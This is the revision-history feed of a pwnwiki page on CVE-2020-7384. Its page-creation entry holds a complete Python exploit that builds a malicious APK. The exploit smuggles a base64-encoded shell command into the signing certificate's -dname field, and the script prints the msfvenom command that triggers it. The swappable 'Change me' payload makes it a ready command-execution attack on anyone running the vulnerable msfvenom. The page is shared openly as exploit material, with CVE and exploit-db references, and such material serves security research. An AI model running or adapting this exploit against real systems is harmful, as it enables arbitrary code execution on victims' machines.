https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-7384_msfvenom_APK%E6%A8%A1%E6%9D%BF%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5
CVE-2020-7384 msfvenom APK模板命令注入 - Revision history
2026-04-10T00:24:43Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-7384_msfvenom_APK%E6%A8%A1%E6%9D%BF%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5&diff=1948&oldid=prev
Atsud0 at 06:41, 30 April 2021
2021-04-30T06:41:58Z
<p></p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 06:41, 30 April 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">=== Info: ===</ins></div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384 CVE-2020-7384]</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">=== EXP</ins>: =<ins class="diffchange diffchange-inline">==</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">## Info</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">[CVE-2020-7384](https</del>:<del class="diffchange diffchange-inline">//cve.mitre.org/cgi-bin/cvename.cgi?name</del>=<del class="diffchange diffchange-inline">CVE-2020-7384)</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">## EXP</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div># Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection</div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l61" >Line 61:</td>
<td colspan="2" class="diff-lineno">Line 56:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">=== Source ===</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">## Source</del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">[https://www.exploit-db.com/exploits/49491 Exploit-db-49491]</ins></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-1947:rev-1948 -->
</table>
Atsud0
https://pwnwiki.com/index.php?title=CVE-2020-7384_msfvenom_APK%E6%A8%A1%E6%9D%BF%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5&diff=1947&oldid=prev
Atsud0: Created page with " ## Info [CVE-2020-7384](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384) ## EXP <pre> # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template c..."
2021-04-30T06:38:57Z
<p>Created page with " ## Info [CVE-2020-7384](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384) ## EXP <pre> # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template c..."</p>
<p><b>New page</b></p><div><br />
<br />
## Info<br />
<br />
[CVE-2020-7384](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7384)<br />
<br />
<br />
## EXP<br />
<br />
<pre><br />
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection<br />
# Exploit Author: Justin Steven<br />
# Vendor Homepage: https://www.metasploit.com/<br />
# Software Link: https://www.metasploit.com/<br />
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0<br />
# CVE : CVE-2020-7384<br />
<br />
#!/usr/bin/env python3<br />
import subprocess<br />
import tempfile<br />
import os<br />
from base64 import b64encode<br />
<br />
# Change me<br />
payload = 'echo "Code execution as $(id)" > /tmp/win'<br />
<br />
# b64encode to avoid badchars (keytool is picky)<br />
payload_b64 = b64encode(payload.encode()).decode()<br />
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"<br />
<br />
print(f"[+] Manufacturing evil apkfile")<br />
print(f"Payload: {payload}")<br />
print(f"-dname: {dname}")<br />
print()<br />
<br />
tmpdir = tempfile.mkdtemp()<br />
apk_file = os.path.join(tmpdir, "evil.apk")<br />
empty_file = os.path.join(tmpdir, "empty")<br />
keystore_file = os.path.join(tmpdir, "signing.keystore")<br />
storepass = keypass = "password"<br />
key_alias = "signing.key"<br />
<br />
# Touch empty_file<br />
open(empty_file, "w").close()<br />
<br />
# Create apk_file<br />
subprocess.check_call(["zip", "-j", apk_file, empty_file])<br />
<br />
# Generate signing key with malicious -dname<br />
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,<br />
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])<br />
<br />
# Sign APK using our malicious dname<br />
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,<br />
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])<br />
<br />
print()<br />
print(f"[+] Done! apkfile is at {apk_file}")<br />
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")<br />
<br />
</pre><br />
<br />
<br />
## Source</div>
Atsud0